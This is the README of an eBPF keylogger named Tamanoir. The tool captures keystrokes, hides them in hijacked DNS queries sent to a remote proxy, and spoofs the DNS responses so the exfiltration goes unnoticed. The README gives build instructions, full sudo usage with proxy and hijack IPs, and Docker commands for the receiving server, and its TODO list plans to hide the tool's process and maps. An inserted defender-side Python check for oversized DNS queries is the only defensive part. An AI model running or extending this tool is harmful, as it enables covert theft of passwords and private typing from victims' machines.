Tamanoir
A KeyLogger using eBPF 🐝
A large anteater of Central and South America, Myrmecophaga tridactyla
💡Overview
- Capture keystrokes and store them in a queue in the kernel.
- Intercept DNS requests, inject the captured keystrokes into the DNS payload, then redirect the request to a designated remote server acting as a DNS proxy.
- On the remote server, extract the keys from the DNS payload and send a valid DNS response.
- Intercept the response and modify its source address so the initial request will complete successfully.
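A defender-side check, added here and not part of Tamanoir, that flags DNS queries carrying bytes beyond the parsed question section. It assumes the extra bytes sit after the question (the README does not say where in the payload they are placed), and the sample queries are constructed.

```python
import struct

def parse_dns_question(pkt: bytes):
    """Parse the 12-byte DNS header and the question section.
    Returns (qname, bytes consumed, ARCOUNT)."""
    if len(pkt) < 12:
        raise ValueError("truncated DNS header")
    _txid, _flags, qdcount, _an, _ns, arcount = struct.unpack("!HHHHHH", pkt[:12])
    off = 12
    labels = []
    for _ in range(qdcount):
        while True:  # walk the length-prefixed labels up to the 0 terminator
            if off >= len(pkt):
                raise ValueError("truncated QNAME")
            ln = pkt[off]
            off += 1
            if ln == 0:
                break
            if ln & 0xC0:  # compression pointers are not valid in a query's question
                raise ValueError("compression pointer in QNAME")
            labels.append(pkt[off:off + ln].decode("ascii", "replace"))
            off += ln
        off += 4  # QTYPE + QCLASS
    if off > len(pkt):
        raise ValueError("truncated question section")
    return ".".join(labels), off, arcount

def trailing_bytes(pkt: bytes) -> bytes:
    """Return any bytes that follow the question section of a query.
    A query with ARCOUNT == 0 (no EDNS OPT record) should end exactly there,
    so leftover bytes are worth alerting on. Queries carrying an OPT record
    are skipped here to avoid false positives."""
    _, consumed, arcount = parse_dns_question(pkt)
    if arcount == 0 and consumed < len(pkt):
        return pkt[consumed:]
    return b""

def build_query(name: str) -> bytes:
    """Build a minimal A/IN query for `name` (constructed sample input)."""
    header = struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)

# Constructed samples: a normal query and one with 8 extra bytes after the
# question, matching the size the proxy expects with PAYLOAD_LEN=8 (placement assumed).
CLEAN_QUERY = build_query("example.com")
SUSPECT_QUERY = build_query("example.com") + b"abcdefgh"
```

Because the tool rewrites the response's source address, client-side resolver logs look normal; the egress side (UDP/53 to a non-sanctioned destination) and the payload shape are where this shows up.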
🚀 Setup
You need a Linux-based OS.
⚒️ Build from source
To build from source, make sure you have:
- bpf-linker installed.
- Rust installed with the nightly toolchain.
1. Build the eBPF program
cd tamanoir-ebpf
cargo build --release
2. Build the user space program
This will produce an executable file at target/release/tamanoir that you can copy to a directory in your $PATH.
📥 Binary release
You can download the pre-built binaries from the release page.
🪄 Usage
Tamanoir
RUST_LOG=info sudo -E tamanoir \
--proxy-ip <DNS proxy IP> \
--hijack-ip <locally configured DNS server IP> \
--layout <keyboard layout> \
--iface <network interface name>
For example:
RUST_LOG=info sudo -E tamanoir \
--proxy-ip 192.168.1.75 \
--hijack-ip 8.8.8.8 \
--layout 0 \
--iface wlan0
Currently, there are two supported keyboard layouts:
0 : qwerty (us)
1 : azerty (fr)
DNS Proxy
On a remote host, make sure you have Docker installed.
1. Build the proxy image
cd proxy
docker build -t proxy .
2. Run the proxy
Note: make sure port 53/udp is available on the host.
docker run --rm -it -p 53:53/udp -e PAYLOAD_LEN=8 proxy
🛠️TODO
- Automatic discovery of the configured local DNS server
- Automatic discovery of the keyboard layout
- Rewrite the DNS proxy in Rust
- Make Tamanoir stealthy (hide the eBPF maps and programs it uses, its process PID, ...)
⚠️ Disclaimer
Tamanoir is developed for educational purposes only.
✍️ Authors
⚖️ License
GPLv3
